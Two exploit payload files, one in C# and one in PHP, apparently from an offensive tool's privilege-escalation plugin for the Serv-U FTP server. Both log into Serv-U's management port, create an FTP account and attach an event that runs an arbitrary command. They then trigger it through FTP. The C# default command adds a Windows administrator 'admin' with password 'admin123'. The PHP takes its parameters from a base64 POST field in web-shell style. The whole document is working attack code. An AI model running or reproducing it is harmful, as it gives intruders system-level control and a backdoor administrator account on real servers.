File: Plugins/PrivilegeEscalation/Serv-U/payloads/ASMX/NebulaPulsar/DarkMatter/payload.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Net.Sockets;
using System.Text;
using System.Text.RegularExpressions;

public class payload
{
    public payload() {}

    public string Execute(object param)
    {
        if (!(param is Dictionary<string, object> mapParam))
        {
            return "[-] ERROR: Invalid parameter type. Expected Dictionary.";
        }
        
        if (!mapParam.TryGetValue("json", out var jsonValue) || string.IsNullOrEmpty(jsonValue?.ToString()))
        {
            return "[-] ERROR: JSON data is empty.";
        }

        string szJson = jsonValue.ToString();
        string host = fnGetJsonValue(szJson, "ip");
        if (string.IsNullOrEmpty(host)) host = "127.0.0.1";

        int port = 43958;
        string portStr = fnGetJsonValue(szJson, "port");
        if (!string.IsNullOrEmpty(portStr) && int.TryParse(portStr, out int parsedPort))
        {
            port = parsedPort;
        }

        string user = fnGetJsonValue(szJson, "user");
        string pass = fnGetJsonValue(szJson, "pass");
        string cmd = fnGetJsonValue(szJson, "cmd");

        if (string.IsNullOrEmpty(user) || string.IsNullOrEmpty(pass))
        {
            return "[-] ERROR: Username and password are required.";
        }

        return RunServUExploit(host, port, user, pass, cmd);
    }

    private string RunServUExploit(string host, int port, string user, string pass, string cmd)
    {
        StringBuilder sb = new StringBuilder();

        try
        {
            using (TcpClient client = new TcpClient())
            {
                IAsyncResult ar = client.BeginConnect(host, port, null, null);
                bool success = ar.AsyncWaitHandle.WaitOne(TimeSpan.FromSeconds(5));
                if (!success || !client.Connected)
                {
                    return $"[-] Failed to connect to Serv-U management port at {host}:{port}.";
                }

                sb.AppendLine("[+] Successfully connected to Serv-U management port...");

                using (NetworkStream stream = client.GetStream())
                {
                    using (StreamReader reader = new StreamReader(stream, Encoding.ASCII))
                    {
                        using (StreamWriter writer = new StreamWriter(stream, Encoding.ASCII) { AutoFlush = true })
                        {
                            reader.ReadLine();

                            writer.Write($"USER {user}\r\n");
                            reader.ReadLine();

                            writer.Write($"PASS {pass}\r\n");
                            string response = reader.ReadLine();

                            if (string.IsNullOrEmpty(response) || 
                                (response.IndexOf("230", StringComparison.Ordinal) == -1 && 
                                 response.IndexOf("Logged in", StringComparison.OrdinalIgnoreCase) == -1))
                            {
                                return "[-] Login failed: Administrative credentials incorrect or changed.";
                            }

                            sb.AppendLine("[+] Successfully authenticated into Serv-U management interface!");

                            writer.Write($"SUSER {user}|{pass}|Y|N\r\n");
                            reader.ReadLine();

                            if (string.IsNullOrEmpty(cmd))
                            {
                                cmd = "cmd.exe /c net user admin admin123 /add && net localgroup administrators admin /add";
                            }
                            writer.Write($"SEVENT {user}|0|0|{cmd}\r\n");
                            reader.ReadLine();

                            sb.AppendLine("[+] Malicious FTP account and Event trigger configured successfully.");
                        }
                    }
                }
            }

            sb.AppendLine("[+] Attempting to trigger the payload via standard FTP port (21)...");
            try
            {
                using (TcpClient ftpClient = new TcpClient())
                {
                    ftpClient.Connect("127.0.0.1", 21);
                    using (NetworkStream ftpStream = ftpClient.GetStream())
                    {
                        using (StreamReader ftpReader = new StreamReader(ftpStream, Encoding.ASCII))
                        {
                            using (StreamWriter ftpWriter = new StreamWriter(ftpStream, Encoding.ASCII) { AutoFlush = true })
                            {
                                ftpReader.ReadLine();
                                ftpWriter.Write($"USER {user}\r\n");
                                ftpReader.ReadLine();
                                ftpWriter.Write($"PASS {pass}\r\n");
                                ftpReader.ReadLine();
                                sb.AppendLine("[+] Payload triggered successfully!");
                            }
                        }
                    }
                }
            }
            catch
            {
                sb.AppendLine("[-] Could not connect to port 21. The event will trigger whenever the account is accessed.");
            }

            return "[+] SUCCESS\n" + sb.ToString();
        }
        catch (Exception ex)
        {
            return "[-] Exception: " + ex.Message;
        }
    }

    private string fnGetJsonValue(string json, string key)
    {
        Match match = Regex.Match(json, $"\"{key}\"\\s*:\\s*\"(.*?)\"");
        if (match.Success) return match.Groups[1].Value;

        match = Regex.Match(json, $"\"{key}\"\\s*:\\s*([^,\\}}\\]]+)");
        if (match.Success) return match.Groups[1].Value.Trim().Replace("\"", "");

        return "";
    }
}

File: Plugins/PrivilegeEscalation/Serv-U/payloads/PHP/v7.X/OneShell/payload.php
<?php

@error_reporting(0);

$json_pattern = json_decode(base64_decode($_POST['z1']), true);
$ip = $json_pattern['ip'];
$port = (int)$json_pattern['port'];
$user = $json_pattern['user'];
$pass = $json_pattern['pass'];
$cmd = $json_pattern['cmd'];

$backdoor_user = 'some_user';
$backdoor_pass = 'some_pass';

function main() {
    global $ip, $port, $user, $pass, $cmd, $backdoor_user, $backdoor_pass;

    $socket = @fsockopen($ip, $port, $errno, $errstr, 5);
    if (!$socket) {
        echo("[-] Failed to connect to Serv-U management port. Port changed or service unavailable.\n");
    }

    echo("[+] Successfully connected to Serv-U management port...\n");

    fgets($socket, 1024);

    fputs($socket, "USER $user\r\n");
    fgetc($socket, 1024);
    fputs($socket, "PASS $pass\r\n");
    $response = fgets($socket, 1024);

    if (strpos($response, "230") === false && strpos($response, "Logged in") == false) {
        echo("[-] Login failed: Default administrative password has been changed.\n");
        return;
    }

    echo("[+] Successfully authenticated into Serv-U management interface!\n");

    fputs($socket, "SUSER $user|$pass|Y|N\r\n");
    fgets($socket, 1024);

    fputs($socket, "SEVENT $user|0|0|$cmd\r\n");
    fgets($socket, 1024);

    echo("[+] Malicious FTP account and event trigger configured successfully.\n");
    fclose($socket);

    echo("[+] Attempting to log into standard FTP port to trigger the SYSTEM payload...\n");
    $ftp = @ftp_connect("127.0.0.1", 21);
    if ($ftp) {
        @ftp_login($ftp, $backdoor_user, $backdoor_pass);
        @ftp_close($ftp);

        echo("[+] Payload triggered! Verify if the Windows user was added.\n");
    } else {
        echo("[-] Could not connect to port 21. The event will trigger whenever the account is accessed.\n");
    }
}

main();

?>